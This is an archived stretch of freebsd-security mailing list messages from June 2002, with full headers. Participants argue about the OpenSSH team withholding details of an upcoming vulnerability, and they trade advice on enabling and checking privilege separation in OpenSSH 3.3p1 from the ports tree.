01:46:10 -0400 (EDT) (envelope-from behanna@zbzoom.net) Date: Tue, 25 Jun 2002 01:46:04 -0400 (EDT) From: Chris BeHanna Reply-To: Chris BeHanna To: FreeBSD Security Subject: Re: [openssh-unix-announce] Re: Upcoming OpenSSH vulnerability (fwd) In-Reply-To: <200206250233.g5P2XBZi009480@khavrinen.lcs.mit.edu> Message-ID: <20020625013911.J7245-100000@topperwein.dyndns.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, 24 Jun 2002, Garrett Wollman wrote: > < said: > > > Result: it's possible to completely prevent the window of > > vulnerability that usually exists between the announcement of an > > exploit and the availability of a fix for same. > > Only if you run absolutely stock, bog-standard OpenSSH. Many of us > have different operational requirements. I can appreciate and sympathize with that; however, how much do you expect the *volunteers* at OpenBSD to do? There may be many variant versions of OpenSSH out there; you can't expect the OpenBSD crew to test with all of them. Theo *could* sit on this a little longer until the privsep code is better tested in the field and until most of the PAM problems are sorted out. Doing so risks that crackers will discover the exploit, if they haven't already. Theo's decided (correct me if I'm wrong, Theo) that the risk of exploitation is greater than the risk due to problems with the new feature. You may disagree. You're not paying anything for the software. An option open to you is to take the privsep code and patch it into your working version of OpenSSH on a test machine and put it through its paces before you deploy it in production. The OpenBSD folks might even help you if you ask nicely and if they have time. That likelihood may increase if the effort is funded. Having been in an "ohmygodihavetoupgradethisnowtoplugahole" frame of mind, I imagine that Theo is in put-out-the-fire mode right now, and that has led to the decisions that he has made. Once again, you're not paying for the software. As for me, I'm going to warn my clients and offer to assist them at no charge. I will share what I learn freely, provided that I don't trip over the exploit myself, in which case I'll hold that back until after Theo has published the patch. -- Chris BeHanna Software Engineer (Remove "bogus" before responding.) behanna@bogus.zbzoom.net Turning coffee into software since 1990. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 22:49: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from trillian.santala.org (ip212-226-173-33.adsl.kpnqwest.fi [212.226.173.33]) by hub.freebsd.org (Postfix) with SMTP id 7DE5937B406 for ; Mon, 24 Jun 2002 22:48:55 -0700 (PDT) Received: (qmail 8761 invoked by uid 11053); 25 Jun 2002 05:48:53 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 25 Jun 2002 05:48:53 -0000 Date: Tue, 25 Jun 2002 08:48:53 +0300 (EEST) From: Jarkko Santala X-X-Sender: jake@trillian.santala.org To: Theo de Raadt Cc: Sean Kelly , Ted Cabeen , "Jacques A. Vidrine" , Subject: Re: Hogwash In-Reply-To: <200206250332.g5P3WQLJ024062@cvs.openbsd.org> Message-ID: <20020625084249.M12462-100000@trillian.santala.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, 24 Jun 2002, Theo de Raadt wrote: > By holding this information back for a few more days, we are > permitting a very important protocol to be upgraded in an immune way, > OR YOU CAN TURN IT OFF NOW. You have mentioned this "turn it off" solution more than twice. Is this your official answer to any exploits in OpenSSH? Can I quote you on this? How do you figure this works for commercial companies that need secsh connections for business critical needs up and running 24x7? -jake -- Jarkko Santala http://www.iki.fi/~jake/ System Administrator 2001:670:83:f08::/64 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 22:56: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from trillian.santala.org (ip212-226-173-33.adsl.kpnqwest.fi [212.226.173.33]) by hub.freebsd.org (Postfix) with SMTP id 93AE437B403 for ; Mon, 24 Jun 2002 22:56:00 -0700 (PDT) Received: (qmail 8953 invoked by uid 11053); 25 Jun 2002 05:55:57 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 25 Jun 2002 05:55:57 -0000 Date: Tue, 25 Jun 2002 08:55:57 +0300 (EEST) From: Jarkko Santala X-X-Sender: jake@trillian.santala.org To: Mike Silbersack Cc: Sean Kelly , Theo de Raadt , Ted Cabeen , "Jacques A. Vidrine" , Subject: Re: Hogwash In-Reply-To: <20020624233910.V55382-100000@patrocles.silby.com> Message-ID: <20020625084905.T12462-100000@trillian.santala.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, 24 Jun 2002, Mike Silbersack wrote: > Theo did miss one possible solution, though: Buy ssh.com's ssh server. > If you find that you're not getting your $0 worth out of OpenSSH, you're > more than welcome to choose an alternate vendor. As there seems to be some misunderstandings on this, let me clarify. ssh.com Secure Shell is free for both commercial and non-commercial use on Linux and free versions of BSD for an unlimited period of time. Other platforms are free for non-commercial use. Full license can be found on their ftp site. The only problem comes if you want to fiddle with the code. So, for both ssh.com and OpenSSH the quality/price ratio is infinite. ;) Sorry for OT, -jake -- Jarkko Santala http://www.iki.fi/~jake/ System Administrator 2001:670:83:f08::/64 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 22:57:12 2002 Delivered-To: freebsd-security@freebsd.org Received: from ns2.austclear.com.au (ns2.austclear.com.au [192.43.185.70]) by hub.freebsd.org (Postfix) with ESMTP id EC63737B405; Mon, 24 Jun 2002 22:56:57 -0700 (PDT) Received: from tungsten.austclear.com.au (tungsten.austclear.com.au [192.168.166.65]) by ns2.austclear.com.au (8.11.2/8.11.3) with ESMTP id g5P5ust26783; Tue, 25 Jun 2002 15:56:54 +1000 (EST) (envelope-from ahl@austclear.com.au) Received: from tungsten (tungsten [192.168.166.65]) by tungsten.austclear.com.au (8.9.3/8.9.3) with ESMTP id PAA07738; Tue, 25 Jun 2002 15:56:54 +1000 (EST) Message-Id: <200206250556.PAA07738@tungsten.austclear.com.au> X-Mailer: exmh version 2.1.1 10/15/1999 To: Jarkko Santala Cc: Theo de Raadt , Sean Kelly , Ted Cabeen , "Jacques A. Vidrine" , freebsd-security@FreeBSD.ORG Subject: Re: Hogwash In-Reply-To: Message from Jarkko Santala of "Tue, 25 Jun 2002 08:48:53 +0300." <20020625084249.M12462-100000@trillian.santala.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 25 Jun 2002 15:56:54 +1000 From: Tony Landells Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org jake@iki.fi said: > How do you figure this works for commercial companies that need secsh > connections for business critical needs up and running 24x7? A couple of possibilities that spring to mind are: 1. Buy the commercial version, and get commercial support. 2. Fund the OpenSSH development so they can put funded resources on to fixing problems (and hence can ignore distracting influences like actually making money to pay for food, or turning in assignments, or ...) If you expect a volunteer group to provide you with iron-clad secure products, or to fix any found problems instantly, I think you're being somewhat unrealistic. They've found a problem, they've issued a warning, they're working on a solution. How much more do you want for free??? Tony -- Tony Landells Senior Network Engineer Ph: +61 3 9677 9319 Australian Clearing Services Pty Ltd Fax: +61 3 9677 9355 Level 4, Rialto North Tower 525 Collins Street Melbourne VIC 3000 Australia To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 23: 2:52 2002 Delivered-To: freebsd-security@freebsd.org Received: from a2.scoop.co.nz (aurora.scoop.co.nz [203.96.152.68]) by hub.freebsd.org (Postfix) with ESMTP id E655637B405 for ; Mon, 24 Jun 2002 23:02:46 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by a2.scoop.co.nz (8.12.2/8.12.2) with ESMTP id g5P62j2G059095; Tue, 25 Jun 2002 18:02:45 +1200 (NZST) (envelope-from andrew@scoop.co.nz) Date: Tue, 25 Jun 2002 18:02:45 +1200 (NZST) From: Andrew McNaughton X-X-Sender: andrew@a2 To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: Workarounds for OpenSSH problems In-Reply-To: <4.3.2.7.2.20020624231924.00db8360@localhost> Message-ID: <20020625175531.F58819-100000@a2> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, 24 Jun 2002, Brett Glass wrote: > A few quick questions. > > Has anyone on the list successfully used privilege separation on the > OpenSSH 3.3p that's now in the ports tree? Does it work? Does privilege > separation have any negative side effects, such as disabling compression I've installed it. It griped and wouldn't start without `mkdir /var/empty`. Having added that it's running, but it hasn't griped about the lack of an 'sshd' user/group. I added them anyway. I don't see any sign of an sshd process running as anything other than root though. Compression is enabled when I connect, but I'm not sure that the privilege separation is actually working. > or some forms of authentication? Since I have a lot of systems to cover, > is it possible to copy just the SSHD binary of the later version over the > one that's installed by default when one installs FreeBSD? (I'd rather do > this than mess with installing a port -- especially since many of my > production machines don't have the ports collection. It's a disk hog.) `make package` on one machine, and then install from the package on the others. It's somewhat dependent on keeping your machines versions in sync, but then its also a strategy which makes it easier tokeep everythin in sync. Andrew McNaughton To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 23:11:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from trillian.santala.org (ip212-226-173-33.adsl.kpnqwest.fi [212.226.173.33]) by hub.freebsd.org (Postfix) with SMTP id 5A6EB37B4AB for ; Mon, 24 Jun 2002 23:08:36 -0700 (PDT) Received: (qmail 9280 invoked by uid 11053); 25 Jun 2002 06:08:33 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 25 Jun 2002 06:08:33 -0000 Date: Tue, 25 Jun 2002 09:08:33 +0300 (EEST) From: Jarkko Santala X-X-Sender: jake@trillian.santala.org To: Tony Landells Cc: Theo de Raadt , Sean Kelly , Ted Cabeen , "Jacques A. Vidrine" , Subject: Re: Hogwash In-Reply-To: <200206250556.PAA07738@tungsten.austclear.com.au> Message-ID: <20020625085925.R12462-100000@trillian.santala.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 25 Jun 2002, Tony Landells wrote: > jake@iki.fi said: > > How do you figure this works for commercial companies that need secsh > > connections for business critical needs up and running 24x7? > > A couple of possibilities that spring to mind are: > > 1. Buy the commercial version, and get commercial support. > > 2. Fund the OpenSSH development so they can put funded resources > on to fixing problems (and hence can ignore distracting influences > like actually making money to pay for food, or turning in assignments, > or ...) With the attitude OpenSSH team has? No commercial company will give money to someone who says "turn it off if it doesn't work". > If you expect a volunteer group to provide you with iron-clad secure > products, or to fix any found problems instantly, I think you're being > somewhat unrealistic. I don't expect, that is exactly what they claim they are doing, giving out iron-clad secure products. ;) I wasn't expecting an instant fix either, I was just pointing out an interesting attitude, "if it doesn't work, just it turn it off" while on the other hand advocating OpenSSH as a viable alternative to commercial products which do not have the luxury of telling that to their customers. ;) > They've found a problem, they've issued a warning, they're working on > a solution. How much more do you want for free??? A cup of java?-) -jake -- Jarkko Santala http://www.iki.fi/~jake/ System Administrator 2001:670:83:f08::/64 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 23:13:37 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id 12B9237B4BC for ; Mon, 24 Jun 2002 23:10:05 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id AAA13446; Tue, 25 Jun 2002 00:09:55 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020625000559.00dcb2c0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 25 Jun 2002 00:09:53 -0600 To: Andrew McNaughton From: Brett Glass Subject: Re: Workarounds for OpenSSH problems Cc: security@FreeBSD.ORG In-Reply-To: <20020625175531.F58819-100000@a2> References: <4.3.2.7.2.20020624231924.00db8360@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 12:02 AM 6/25/2002, Andrew McNaughton wrote: >I've installed it. It griped and wouldn't start without `mkdir >/var/empty`. Having added that it's running, but it hasn't griped about >the lack of an 'sshd' user/group. I added them anyway. I don't see any >sign of an sshd process running as anything other than root though. >Compression is enabled when I connect, but I'm not sure that the privilege >separation is actually working. I'd be inclined to think it wasn't. Did you make with -D OPENSSH_OVERWRITE_BASE so that it overwrote the old implementation? (You might still be running the old one.) >`make package` on one machine, and then install from the package on the >others. It's somewhat dependent on keeping your machines versions in >sync, but then its also a strategy which makes it easier tokeep everythin >in sync. I've got to deal with machines running several versions. Some of which are old enough that they might not be supported by the latest port. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 23:25:28 2002 Delivered-To: freebsd-security@freebsd.org Received: from caligula.anu.edu.au (caligula.anu.edu.au [150.203.224.42]) by hub.freebsd.org (Postfix) with ESMTP id CBB5837B407 for ; Mon, 24 Jun 2002 23:25:21 -0700 (PDT) Received: (from avalon@localhost) by caligula.anu.edu.au (8.9.3/8.9.3) id QAA01010; Tue, 25 Jun 2002 16:25:19 +1000 (EST) From: Darren Reed Message-Id: <200206250625.QAA01010@caligula.anu.edu.au> Subject: Re: Hogwash To: ahl@austclear.com.au (Tony Landells) Date: Tue, 25 Jun 2002 16:25:18 +1000 (Australia/ACT) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <200206250556.PAA07738@tungsten.austclear.com.au> from "Tony Landells" at Jun 25, 2002 03:56:54 PM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In some mail from Tony Landells, sie said: [...] > If you expect a volunteer group to provide you with iron-clad secure > products, or to fix any found problems instantly, I think you're being > somewhat unrealistic. [...] This *is* what they claim to do. Personally, I think their claims are unrealistic and all the hype about "software audit" is just that - hype. If the OpenSSH team are working with ISS on a fix then it seems to me that ISS found this problem, not the OpenSSH team. Why did the audit by the OpenSSH team miss this problem ? Isn't this what their code audits are meant to find - security bugs ? What benefit are we *really* getting from their "code audits" ? Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 23:27:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from boleskine.patpro.net (boleskine.patpro.net [62.4.20.155]) by hub.freebsd.org (Postfix) with ESMTP id 19E9B37B492 for ; Mon, 24 Jun 2002 23:27:14 -0700 (PDT) Received: from localhost (cassandre [192.168.0.1]) by boleskine.patpro.net (8.11.3/8.11.3) with ESMTP id g5P6RHY46068 for ; Tue, 25 Jun 2002 08:27:17 +0200 (CEST) (envelope-from patpro@patpro.net) Date: Tue, 25 Jun 2002 08:27:12 +0200 Subject: Re: Workarounds for OpenSSH problems Content-Type: text/plain; charset=US-ASCII; format=flowed Mime-Version: 1.0 (Apple Message framework v482) From: patpro To: security@FreeBSD.ORG Content-Transfer-Encoding: 7bit In-Reply-To: <20020625175531.F58819-100000@a2> Message-Id: <957C6FD8-8804-11D6-919D-0030654D97EC@patpro.net> X-Mailer: Apple Mail (2.482) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On mardi, juin 25, 2002, at 08:02 , Andrew McNaughton wrote: > I've installed it. It griped and wouldn't start without `mkdir > /var/empty`. Having added that it's running, but it hasn't griped about > the lack of an 'sshd' user/group. I added them anyway. I don't see any > sign of an sshd process running as anything other than root though. > Compression is enabled when I connect, but I'm not sure that the privilege > separation is actually working. If you read the README.privsep in the source directory (found in /usr/ports/ distfiles/openssh-3.3p1.tar.gz if you upgraded using ports) and follow the instruction. You should have then a functional privsep : bash-2.05a$ ps -aux | grep sshd | grep -v grep root 178 0.0 1.3 2088 1180 ?? Is 4:40PM 0:00.20 /usr/local/sbin/sshd root 61294 0.0 1.8 4868 1656 ?? I 8:21AM 0:00.05 sshd: patpro [priv] (sshd) patpro 61296 0.0 1.9 5000 1744 ?? S 8:21AM 0:00.14 sshd: patpro@ ttyp0 (sshd) (FreeBSD 4.4) patpro To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 23:33: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from caligula.anu.edu.au (caligula.anu.edu.au [150.203.224.42]) by hub.freebsd.org (Postfix) with ESMTP id CFA0D37B41B for ; Mon, 24 Jun 2002 23:32:50 -0700 (PDT) Received: (from avalon@localhost) by caligula.anu.edu.au (8.9.3/8.9.3) id QAA02400 for security@FreeBSD.ORG; Tue, 25 Jun 2002 16:32:49 +1000 (EST) From: Darren Reed Message-Id: <200206250632.QAA02400@caligula.anu.edu.au> Subject: Time to look put more resources into FreeSSH ? To: security@FreeBSD.ORG Date: Tue, 25 Jun 2002 16:32:49 +1000 (Australia/ACT) X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I think the subject raises the question well enough. What do others think about creating a little "bio-diversity" and moving from OpenSSH to FreeSSH at some point in the future as the "default" ssh installed ? Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 23:51:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from smtp.web.de (smtp01.web.de [194.45.170.210]) by hub.freebsd.org (Postfix) with ESMTP id 3C7E837B779 for ; Mon, 24 Jun 2002 23:47:42 -0700 (PDT) Received: from [80.129.115.197] (helo=floundjan.homeip.net) by smtp.web.de with esmtp (WEB.DE(Exim) 4.70 #5) id 17Mk72-00064h-00 for freebsd-security@FreeBSD.ORG; Tue, 25 Jun 2002 08:47:40 +0200 Received: from localhost (localhost.lan [127.0.0.1]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id B9B1C40A for ; Tue, 25 Jun 2002 08:47:38 +0200 (CEST) Received: from jan-linnb.lan (jan-linnb.lan [192.168.0.25]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id 4CD2A3B2 for ; Tue, 25 Jun 2002 08:47:35 +0200 (CEST) Subject: How to check if "UsePrivilegeSeparation" works in OpenSSH? From: Jan Lentfer To: freebsd-security@FreeBSD.ORG Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7 Date: 25 Jun 2002 08:46:40 +0200 Message-Id: <1024987600.2078.10.camel@jan-linnb.lan> Mime-Version: 1.0 X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi all, i replaced the base OpenSSH with 3.3p from the ports typing: bash-2.05# make -DOPENSSH_OVERWRITE_BASE bash-2.05# make -DOPENSSH_OVERWRITE_BASE install I then added "sshd_program=/usr/local/sbin/sshd" to /etc/rc.conf and uncommented NO_OPENSSH=true and NO_OPENSSL=true in etc make.conf. Finally I added "UsePrivilegeSeparation yes" to /etc/ssh/sshd_config and SIGHUPed sshd. sshd -V no reports version 3.3. Am I set and done? Is there a way to check if Privilege Seperation really works? Many thanks in advance, Jan PS: Sorry if this is a newbie question or has already been discussed elsewhere To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 23:55:46 2002 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [216.240.41.2]) by hub.freebsd.org (Postfix) with ESMTP id 7755537B7B4 for ; Mon, 24 Jun 2002 23:48:27 -0700 (PDT) Received: from apollo.backplane.com (localhost [127.0.0.1]) by apollo.backplane.com (8.12.3/8.12.3) with ESMTP id g5P6mFl1003149; Mon, 24 Jun 2002 23:48:15 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.12.3/8.12.3/Submit) id g5P6mFAq003148; Mon, 24 Jun 2002 23:48:15 -0700 (PDT) (envelope-from dillon) Date: Mon, 24 Jun 2002 23:48:15 -0700 (PDT) From: Matthew Dillon Message-Id: <200206250648.g5P6mFAq003148@apollo.backplane.com> To: Darren Reed Cc: ahl@austclear.com.au (Tony Landells), freebsd-security@FreeBSD.ORG Subject: Re: Hogwash References: <200206250625.QAA01010@caligula.anu.edu.au> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Will you guys stop arguing, I'm getting a headache. Or would you rather not have an openssh at all? Sheesh. -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 23:56:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from enterprise.francisscott.net (enterprise.francisscott.net [64.81.95.235]) by hub.freebsd.org (Postfix) with ESMTP id E633B37B932 for ; Mon, 24 Jun 2002 23:53:37 -0700 (PDT) Received: from cobalt.heavymetal.org (cobalt.heavymetal.org [64.81.95.242]) by enterprise.francisscott.net (Postfix) with ESMTP id C3EAE57BB for ; Mon, 24 Jun 2002 23:53:37 -0700 (PDT) Received: from cobalt.heavymetal.org (localhost.heavymetal.org [127.0.0.1]) by cobalt.heavymetal.org (Postfix) with ESMTP id 831A1312C for ; Mon, 24 Jun 2002 23:53:37 -0700 (PDT) Date: Mon, 24 Jun 2002 23:53:37 -0700 From: Scott Lampert To: security@freebsd.org Subject: Re: Time to look put more resources into FreeSSH ? Message-Id: <20020624235337.4d93e7ab.scott@lampert.org> In-Reply-To: <200206250632.QAA02400@caligula.anu.edu.au> References: <200206250632.QAA02400@caligula.anu.edu.au> X-Mailer: Sylpheed version 0.7.8claws (GTK+ 1.2.10; i386-portbld-freebsd4.5) X-Operating-System: FreeBSD 4.5-RELEASE-p4 Mime-Version: 1.0 Importance: high X-Priority: 1 (Highest) Content-Type: multipart/signed; protocol="application/pgp-signature"; boundary="=._Q0/CWKiYlh3l2" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --=._Q0/CWKiYlh3l2 Content-Type: multipart/mixed; boundary="Multipart_Mon__24_Jun_2002_23:53:37_-0700_081f5400" --Multipart_Mon__24_Jun_2002_23:53:37_-0700_081f5400 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit On Tue, 25 Jun 2002 16:32:49 +1000 (Australia/ACT) "Darren Reed" wrote: > > I think the subject raises the question well enough. > > What do others think about creating a little "bio-diversity" and > moving from OpenSSH to FreeSSH at some point in the future as the > "default" ssh installed ? > > Darren > If it means having realistic and usable solutions without silly posturing or having someone in the know dictate "my way or the highway" diatribe, I'm all for it. -Scott -- Scott Lampert "They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety." -Benjamin Franklin, 1759 Public Key: http://www.lampert.org/lampert.key --Multipart_Mon__24_Jun_2002_23:53:37_-0700_081f5400 Content-Type: application/pgp-signature; name="00000003.mimetmp" Content-Disposition: attachment; filename="00000003.mimetmp" Content-Transfer-Encoding: base64 LS0tLS1CRUdJTiBQR1AgU0lHTkFUVVJFLS0tLS0KVmVyc2lvbjogR251UEcgdjEuMC43IChGcmVl QlNEKQoKaUQ4REJRRTlHQkw4U1ZMMy91V0U3eFlSQXI2ZkFKOUkyTEI5Z0xxTnhRUllZT3JDdHhE dEdoRTUxQUNncVJuUApBNVRtUEZvUnk0Ty9qY1ZtSGxKblI4WT0KPUcyckMKLS0tLS1FTkQgUEdQ IFNJR05BVFVSRS0tLS0tCgo= --Multipart_Mon__24_Jun_2002_23:53:37_-0700_081f5400-- --=._Q0/CWKiYlh3l2 Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9GBNxSVL3/uWE7xYRAhqzAJ4oiCsIkRI0wWtrcNJ7fMRqkl0+KwCfQMCL YTpyYhfIyTyuMC9ScHMSxC0= =U6jc -----END PGP SIGNATURE----- --=._Q0/CWKiYlh3l2-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 23:57:20 2002 Delivered-To: freebsd-security@freebsd.org Received: from enterprise.francisscott.net (enterprise.francisscott.net [64.81.95.235]) by hub.freebsd.org (Postfix) with ESMTP id F248937B88A for ; Mon, 24 Jun 2002 23:51:45 -0700 (PDT) Received: from cobalt.heavymetal.org (cobalt.heavymetal.org [64.81.95.242]) by enterprise.francisscott.net (Postfix) with ESMTP id BDB3B57BB; Mon, 24 Jun 2002 23:51:45 -0700 (PDT) Received: from cobalt.heavymetal.org (localhost.heavymetal.org [127.0.0.1]) by cobalt.heavymetal.org (Postfix) with ESMTP id 44D353317; Mon, 24 Jun 2002 23:51:40 -0700 (PDT) Date: Mon, 24 Jun 2002 23:51:39 -0700 From: Scott Lampert To: "Darren Reed" Cc: freebsd-security@freebsd.org Subject: Re: Time to look put more resources into FreeSSH ? Message-Id: <20020624235139.24a51461.scott@lampert.org> In-Reply-To: <200206250632.QAA02400@caligula.anu.edu.au> References: <200206250632.QAA02400@caligula.anu.edu.au> X-Mailer: Sylpheed version 0.7.8claws (GTK+ 1.2.10; i386-portbld-freebsd4.5) X-Operating-System: FreeBSD 4.5-RELEASE-p4 Mime-Version: 1.0 Content-Type: multipart/signed; protocol="application/pgp-signature"; boundary="=.IY4cf:G8,KDCL," Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --=.IY4cf:G8,KDCL, Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit On Tue, 25 Jun 2002 16:32:49 +1000 (Australia/ACT) "Darren Reed" wrote: > > I think the subject raises the question well enough. > > What do others think about creating a little "bio-diversity" and > moving from OpenSSH to FreeSSH at some point in the future as the > "default" ssh installed ? > > Darren > If it means having realistic and usable solutions without silly posturing or having someone in the know dictate "my way or the highway" diatribe, I'm all for it. -Scott -- Scott Lampert "They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety." -Benjamin Franklin, 1759 Public Key: http://www.lampert.org/lampert.key --=.IY4cf:G8,KDCL, Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9GBL8SVL3/uWE7xYRAr6fAJ9I2LB9gLqNxQRYYOrCtxDtGhE51ACgqRnP A5TmPFoRy4O/jcVmHlJnR8Y= =G2rC -----END PGP SIGNATURE----- --=.IY4cf:G8,KDCL,-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 0: 0:31 2002 Delivered-To: freebsd-security@freebsd.org Received: from ns2.austclear.com.au (ns2.austclear.com.au [192.43.185.70]) by hub.freebsd.org (Postfix) with ESMTP id A695037BA6F for ; Mon, 24 Jun 2002 23:59:05 -0700 (PDT) Received: from tungsten.austclear.com.au (tungsten.austclear.com.au [192.168.166.65]) by ns2.austclear.com.au (8.11.2/8.11.3) with ESMTP id g5P6x4t27120; Tue, 25 Jun 2002 16:59:04 +1000 (EST) (envelope-from ahl@austclear.com.au) Received: from tungsten (tungsten [192.168.166.65]) by tungsten.austclear.com.au (8.9.3/8.9.3) with ESMTP id QAA09566; Tue, 25 Jun 2002 16:59:04 +1000 (EST) Message-Id: <200206250659.QAA09566@tungsten.austclear.com.au> X-Mailer: exmh version 2.1.1 10/15/1999 To: Darren Reed Cc: ahl@austclear.com.au (Tony Landells), freebsd-security@FreeBSD.ORG Subject: Re: Hogwash In-Reply-To: Message from Darren Reed of "Tue, 25 Jun 2002 16:25:18 +1000." <200206250625.QAA01010@caligula.anu.edu.au> Mime-Version: 1.0 Content-Type: 